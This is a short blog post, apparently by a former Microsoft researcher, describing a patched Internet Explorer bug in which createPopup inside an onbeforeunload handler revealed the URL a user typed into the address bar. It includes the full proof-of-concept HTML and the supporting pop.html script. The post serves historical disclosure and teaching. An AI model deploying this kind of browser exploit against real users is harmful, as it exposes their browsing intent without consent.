Capturing Address Bar Input via createPopup and onbeforeunload

This one surprised me. By combining createPopup with an onbeforeunload handler, a page could learn the exact URL the user typed in the address bar the moment they pressed Enter — before the browser even navigated there.

<!DOCTYPE html>
<html xmlns="http://www.w3.org/1999/xhtml">
<head><title>ShowMeWhatYouTypedInTheAddressBar</title>
<meta http-equiv="X-UA-Compatible" content="IE=EmulateIE8" />
</head>
<body>
<script language="JavaScript">
function main()
{
	createPopup().document.body.innerHTML = '<object data="pop.html" type="text/html"></object>';
}
window.onbeforeunload = function()
{
	main();
}

</script>
</body>
</html>

The supporting pop.html file simply ran:

<script>
alert(location.href);
</script>

When the user typed a new URL and pressed Enter, onbeforeunload fired. Inside that handler, a createPopup was created and an HTML <object> pointing to pop.html was written into it. Because the popup’s object loaded in the context of the new navigation, its location.href reflected exactly the URL the user had just requested. The result was a clean disclosure of browsing intent before the page even loaded.

Found during my years at Microsoft (2006–2014). These bugs were patched long ago — shared here as a historical record for learning purposes.

Read other posts

< [Spoofing the User's Saved Webpage via pushState + Server Redirect] :: [Grabbing data from Inputs and Textareas (Edge/IE)] >